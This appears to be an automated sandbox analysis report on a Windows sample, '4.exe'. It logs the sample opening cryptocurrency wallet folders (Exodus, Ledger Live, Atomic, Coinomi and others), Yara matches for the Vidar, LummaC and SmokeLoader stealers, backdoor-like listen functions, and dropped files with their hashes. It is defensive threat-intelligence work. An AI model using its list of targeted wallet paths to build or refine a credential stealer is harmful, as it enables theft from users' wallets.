Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: Process Memory Space: F441.exe PID: 3192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR

Remote Access Functionality

Yara detected CryptOne packer

Source: Yara match

File source: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D080D60 sqlite3_bind_parameter_name,	9_2_6D080D60
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D080C40 sqlite3_bind_zeroblob,	9_2_6D080C40
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA8EA0 sqlite3_clear_bindings,	9_2_6CFA8EA0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D080B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	9_2_6D080B40
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA6410 bind,WSAGetLastError,	9_2_6CFA6410
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA60B0 listen,WSAGetLastError,	9_2_6CFA60B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA6070 PR_Listen,	9_2_6CFA6070
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFAC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	9_2_6CFAC050
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFAC030 sqlite3_bind_parameter_count,	9_2_6CFAC030
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF322D0 sqlite3_bind_blob,	9_2_6CF322D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA63C0 PR_Bind,	9_2_6CFA63C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA94F0 sqlite3_bind_text16,	9_2_6CFA94F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA94C0 sqlite3_bind_text,	9_2_6CFA94C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA9480 sqlite3_bind_null,	9_2_6CFA9480
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA9400 sqlite3_bind_int64,	9_2_6CFA9400

Windows Analysis Report
4.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1447651
Product:	CloudBasic
Start time:	10:21:06
Start date:	26.05.2024
Sample:	4.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	73ddf9a7f42e0452b6aa00f4e0a0afd5
SHA1:	79ea2d473e72751803c9650ae5c6b144a0aa4879
SHA256:	c166b490846d441400727765dd668262087642bae1bbfd7aaf7a1bed5aa35b62
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\HJJJECFIECBG\AKECBF	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\HJJJECFIECBG\BFCFBF	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4	6A6BAD38068B0F6F2CADC6464C4FE8F0	4E3B235898D8E900548613DDB6EA59CDA5EB4E68	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
C:\ProgramData\HJJJECFIECBG\CBKJJE	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1	349E6EB110E34A08924D92F6B334801D	BDFB289DAFF51890CC71697B6322AA4B35EC9169	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
C:\ProgramData\HJJJECFIECBG\EBGCFB	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11	41EA9A4112F057AE6BA17E2838AEAC26	F2B389103BFD1A1A050C4857A995B09FEAFE8903	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
C:\ProgramData\HJJJECFIECBG\EHDGCG	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2	A2D1F4CF66465F9F0CAC61C4A95C7EDE	BA6A845E247B221AAEC96C4213E1FD3744B10A27	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
C:\ProgramData\HJJJECFIECBG\GIEHJD	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\HJJJECFIECBG\GIEHJD-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\HJJJECFIECBG\HCFIII	ASCII text, with very long lines (1809), with CRLF line terminators	5D8E5D85E880FB2D153275FCBE9DA6E5	72332A8A92B77A8B1E3AA00893D73FC2704B0D13	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
C:\ProgramData\HJJJECFIECBG\IDHIDB	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	28591AA4E12D1C4FC761BE7C0A468622	BC4968A84C19377D05A8BB3F208FBFAC49F4820B	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
C:\ProgramData\HJJJECFIECBG\JKEGDH	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	C0FDF21AE11A6D1FA1201D502614B622	11724034A1CC915B061316A96E79E9DA6A00ADE8	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
C:\ProgramData\HJJJECFIECBG\JKEGDH-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\HJJJECFIECBG\KKEHIE	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\ProgramData\HJJJECFIECBG\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\HJJJECFIECBG\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\HJJJECFIECBG\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\HJJJECFIECBG\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\HJJJECFIECBG\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\HJJJECFIECBG\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_F441.exe_d344ba73f4609dd422b4db8860abf6e38825755_836b94ca_b374aa5a-abc7-4013-9dc4-d7a423473300\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	77E823235AEF409E7E2972F7C0EE5BA7	20489196181EAD2610E9C796F7BC77ED24472319	B74D235F91E0C50797CC052DCD886E77AC40490D59344869DDBABCBF1A813DDA
C:\ProgramData\Microsoft\Windows\WER\Temp\WER93BD.tmp.dmp	Mini DuMP crash report, 15 streams, Sun May 26 08:23:12 2024, 0x1205a4 type	9E5235DCD44CFB38D84CE7E624AA5205	475B0F36D00D0348B09FA65B4B471FECFAE8C6A6	F743B5CD52A9E756841448C928E9A1244B75B91EF24DDFFE080D696DC34917B2
C:\ProgramData\Microsoft\Windows\WER\Temp\WER94B8.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	76B7472523084A5986E2C4100E7906F3	988860BAE933A5E7A8494E061CC7D0D986F9672F	5F02BDA1A7692F206230DE9782784D827C4B25E8677CD2BB4FD2576351DBABF1
C:\ProgramData\Microsoft\Windows\WER\Temp\WER94E8.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	3053D2BE1C2B94C27C17149249B0F4B9	12EF54FCFA81AE79D6259F18A5CDCCBD8C2ECC9E	492FF479F0DBB891202C5751EFC0765E6A2583EB026F8545B0236CDB05493965
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199689717899[1].htm	HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators	1466716F0C9153F76BB57D4860843664	060D12CA6D7A80B42795403C5A6A233B9F259F26	FAFEE04A5A012597F585AEE58155A34C5531E7E7E1F91D60B9FE893F8E7CBB29
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	90E744829865D57082A7F452EDC90DE5	833B178775F39675FA4E55EAB1032353514E1052	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Temp\9EDA.exe	PE32 executable (GUI) Intel 80386, for MS Windows	7BDE08F5DD2A433DAE25A8F8B3E70970	648FF6ECDB0E0769055EA8FFC49A78D6833632E4	3F8A5414C8ED56D541974D3B650C9CF798A2FDEFEAF5FB307540FD64C99D29D5
C:\Users\user\AppData\Local\Temp\F441.exe	PE32 executable (GUI) Intel 80386, for MS Windows	EA9DD1EAE2E521666D3F06382104EC10	46E89AFEB61C1D0852412480EE202D48C7D5ACEB	472785C4ADDBA719D551E2C3AFD1C94AE46140331EB0A50F3EAAE2E0D6C659A9
C:\Users\user\AppData\Local\Temp\kat796E.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	66064DBDB70A5EB15EBF3BF65ABA254B	0284FD320F99F62ACA800FB1251EFF4C31EC4ED7	6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
C:\Users\user\AppData\Roaming\sdveeeu	PE32 executable (GUI) Intel 80386, for MS Windows	73DDF9A7F42E0452B6AA00F4E0A0AFD5	79EA2D473E72751803C9650AE5C6B144A0AA4879	C166B490846D441400727765DD668262087642BAE1BBFD7AAF7A1BED5AA35B62
C:\Users\user\AppData\Roaming\sdveeeu:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309

Windows Analysis Report 4.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
4.exe

Malware Threat Intel
Provided by